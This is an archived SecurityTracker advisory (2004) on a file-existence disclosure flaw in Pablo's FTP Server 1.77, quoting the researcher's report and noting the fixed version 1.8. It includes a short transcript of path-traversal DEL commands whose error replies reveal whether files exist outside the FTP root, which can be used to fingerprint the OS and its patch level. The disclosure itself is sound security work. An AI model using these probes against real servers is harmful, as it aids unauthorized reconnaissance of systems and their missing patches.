SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   Pablo's FTP Server Vendors:   Pablo Software Solutions
Pablo FTP Server Lets Remote Authenticated Users Determine File Existence
SecurityTracker Alert ID:  1008756
SecurityTracker URL:  http://securitytracker.com/id/1008756
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 18 2004
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.77
Description:   Arnaud Jacques from securiteinfo.com reported a vulnerability in the FTP Server from Pablo Software Solutions. A remote authenticated user can determine if a specified file exists on the target server.

It is reported that a remote authenticated user can invoke the DEL command (e.g., "del ../WINNT/Q328310.log") on an arbitrary file located outside of the FTP root directory to determine if the file exists or not. If the specified file exists, the server reportedly responds with:

550 Permission denied.

If the specified file does not exist, the server reportedly responds with:

550 File not found.

Impact:   A remote authenticated user, including an anonymous user, can determine whether a specified file located anywhere on the system exists on the target server.
Solution:   The vendor has released a fixed version (1.8), available at:

http://www.pablovandermeer.nl/ftp_server.html

Vendor URL:  www.pablovandermeer.nl/ftp_server.html (Links to External Site)
Cause:   State error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Pablo Sofware Solutions FTP server can detect if a file exists outside


Pablo Sofware Solutions FTP server can detect if a file exists outside the FTP
root directory


.oO Overview Oo.

Pablo Software Solutions FTP server version 1.77 can detect if a file exists
outside the FTP root directory.
Discovered on 2004, January, 11th
Vendor: Pablo Software Solutions (http://www.pablovandermeer.nl)

Pablo's FTP Server is a multi threaded FTP server for Windows 98/NT/XP. It
comes with an easy to use interface and can be accessed from the system tray.
The server handles all basic FTP commands and offers easy user account
management and support for virtual directories. This FTP server can detect if
a file exists outside the FTP root directory.


.oO Details Oo.

The vulnerability can be done using the MS-DOS ftp client. When you are logged
on the server, you can send a del \..\<filename> supposed your root directory
is c:\ftp_server
If <filename> exists, the FTP server answers "550 Permission denied." If
<filename> doesn't exist, the FTP server answers "550 File not found."
In any case, the file is never deleted. That is normal.


.oO Exploit Oo.

Checking if a file exists on a remote system can be usefull to :

     * Fingerprint the OS. OSes don't have the same installed files by default.
By this way, you can know if the remote system is Windows NT, or 2000 or
XP...
     * Know the vulnerabilities of a system. By testing if
"../WINNT/Q329115.log" exists, you can know if the remote system have this
patch installed
     * Maybe some other interesting things...

Here is an example of the vulnerability :

C:\>ftp 127.0.0.1
220 Welcome to Pablo's FTP Server
Utilisateur (127.0.0.1:(none)) : test
331 Password required for test
Mot de passe :
230 User successfully logged in.
ftp> dir
200 Port command successful.
150 Opening ASCII mode data connection for directory list.
-rwx------ 1 user group 0 Jan 11 18:18 ceci est le repertoire test.txt
226 Transfer complete
ftp> dir ..
200 Port command successful.
550 "..": Permission denied. That is OK.
ftp> cd ..
550 "..": Permission denied. That is OK.
ftp> del ../WINNT/Q328310.log
550 Permission denied. File exists !
ftp> del ../WINNT/Q329115.log
550 File not found. File does not exists !
ftp> quit


.oO Solution Oo.

The vendor has been informed and has solved the problem.
Download Pablo's FTP server 1.8 at
http://www.pablovandermeer.nl/ftp_server.html


.oO Discovered by Oo.

Arnaud Jacques aka scrap
webmaster@securiteinfo.com
http://www.securiteinfo.com


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC